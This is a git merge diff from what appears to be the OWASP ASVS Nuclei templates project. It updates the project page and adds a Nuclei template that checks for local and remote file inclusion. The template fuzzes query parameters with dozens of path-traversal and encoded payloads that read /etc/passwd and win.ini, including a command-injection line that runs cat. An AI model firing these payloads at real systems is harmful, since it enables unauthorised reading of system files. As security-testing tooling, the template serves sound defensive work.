Merge branch 'dev' into main

Signed-off-by: Hamed Salimian <[email protected]>

Author: Snbig

index.md

@@ -2,7 +2,7 @@
 
 layout: col-sidebar
 title: OWASP ASVS Security Evaluation Templates with Nuclei
-tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates asvs asvs-evaluation PoC-generator vulnerablity 
+tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates ASVS asvs-evaluation PoC-generator vulnerablity automation WSTG pentest
 level: 2
 type: tool
 pitch: This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites.
@@ -32,3 +32,13 @@ This project aims to develop  [Nuclei](https://github.com/projectdiscovery/nucle
 [![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE)
 
 This program is free software: You can redistribute it and/or modify it under the terms of the MIT License.
+
+## Contributing
+
+Contributions to this repository are welcome and encouraged. If you have created new Nuclei templates that evaluate additional ASVS requirements or have any idea about current templates, we'd love to hear from you in project Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43). 
+
+For detailed information and guidelines about contributing in developing template for ASVS evaluation, please check [CONTRIBUTING.md](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/CONTRIBUTING.md)
+
+#### Core Team
+The project current core team are:
+- [Hamed Salimain](https://github.com/Snbig)  (Project Leader)

templates/9.1.3.yaml

@@ -45,4 +45,4 @@ ssl:
       - type: json
         json:
           - " .tls_version"
-# digest: 4b0a00483046022100ad668aabd5f22ba949265c214a22dd6393fc9d65118f5551704be20c9791b4fa022100a7d26f7b256f003b8db0d8794e22f7e63f051f5674b5ff4ed8a01b6cfa8787e3:236a7c23afe836fbe231d6e037cff444
+# digest: 4b0a00483046022100e28690ed9b4e02b2f1b32d3e5fea4266b8aea6d668d35365ed9e94ad9515ae8e022100e25e0fd48313f9be115c8f93bb91dc18ad74ebf1997576b72c99e810ac804570:236a7c23afe836fbe231d6e037cff444

templates/dast/5.3.9.yaml

@@ -0,0 +1,144 @@
+id: ASVS-4-0-3-V5-3-9
+
+info:
+  name: ASVS 5.3.9 Check
+  author: AmirHossein Raeisi
+  severity: high
+  classification:
+    cwe-id: CWE-829
+  reference:
+    - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
+    - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_9/
+    - https://github.com/projectdiscovery/nuclei-templates/tree/main/dast/vulnerabilities/lfi
+    - https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/
+    - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion
+  tags: asvs,5.3.9
+  description: |
+    Verify that the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks.
+  metadata:
+    max-request: 90
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      LFI-RFI:
+        # LFI (Linux)
+        - '/etc/passwd'
+        - '../etc/passwd'
+        - '../../etc/passwd'
+        - '../../../etc/passwd'
+        - '/../../../../etc/passwd'
+        - '../../../../../../../../../etc/passwd'
+        - '../../../../../../../../etc/passwd'
+        - '../../../../../../../etc/passwd'
+        - '../../../../../../etc/passwd'
+        - '../../../../../etc/passwd'
+        - '../../../../etc/passwd'
+        - '../../../etc/passwd'
+        - '../../../etc/passwd%00'
+        - '../../../../../../../../../../../../etc/passwd%00'
+        - '../../../../../../../../../../../../etc/passwd'
+        - '/../../../../../../../../../../etc/passwd^^'
+        - '/../../../../../../../../../../etc/passwd'
+        - '/./././././././././././etc/passwd'
+        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
+        - '..\..\..\..\..\..\..\..\..\..\etc\passwd'
+        - '/..\../..\../..\../..\../..\../..\../etc/passwd'
+        - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
+        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
+        - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
+        - '%252e%252e%252fetc%252fpasswd'
+        - '%252e%252e%252fetc%252fpasswd%00'
+        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
+        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
+        - '....//....//etc/passwd'
+        - '..///////..////..//////etc/passwd'
+        - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
+        - '%0a/bin/cat%20/etc/passwd'
+        - '%00/etc/passwd%00'
+        - '%00../../../../../../etc/passwd'
+        - '/../../../../../../../../../../../etc/passwd%00.jpg'
+        - '/../../../../../../../../../../../etc/passwd%00.html'
+        - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
+        - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '\\'/bin/cat%20/etc/passwd\\''
+        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+        # LFI (Windows)
+        - '\WINDOWS\win.ini'
+        - '../../windows/win.ini'
+        - '....//....//windows/win.ini'
+        - '../../../../../windows/win.ini'
+        - '/..///////..////..//////windows/win.ini'
+        - '/../../../../../../../../../windows/win.ini'
+        - './../../../../../../../../../../windows/win.ini'
+        - '..%2f..%2f..%2f..%2fwindows/win.ini'
+        - '\WINDOWS\win.ini%00'
+        - '\WINNT\win.ini'
+        - '\WINNT\win.ini%00'
+        - 'windows/win.ini%00'
+        - '/...\...\...\...\...\...\...\...\...\windows\win.ini'
+        - '/.../.../.../.../.../.../.../.../.../windows/win.ini'
+        - '/..../..../..../..../..../..../..../..../..../windows/win.ini'
+        - '/....\....\....\....\....\....\....\....\....\windows\win.ini'
+        - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
+        - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
+        - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
+        - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+        - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+        - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
+        - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
+        - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
+        - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+        - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
+        - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
+        - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
+        - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
+        - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
+        - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
+        - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
+        - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
+        - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
+        - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
+        - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
+        - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
+        - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'
+          # RFI
+        - "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt"
+    fuzzing:
+      - part: query
+        type: replace # replaces existing parameter value with fuzz payload
+        mode: multiple # replaces all parameters value with fuzz payload
+        fuzz:
+          - '{{LFI-RFI}}'
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+
+      - type: word
+        part: body
+        words:
+          - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a"
+# digest: 4b0a00483046022100b3629f17d8650d25acbacc2d85fae5ad2c1cecf14c89bb28701ce2c7011ffe05022100a6db4746322beb7989b39c1b04fb416b31f02ac55a9690507e46a62ae93f2ac5:236a7c23afe836fbe231d6e037cff444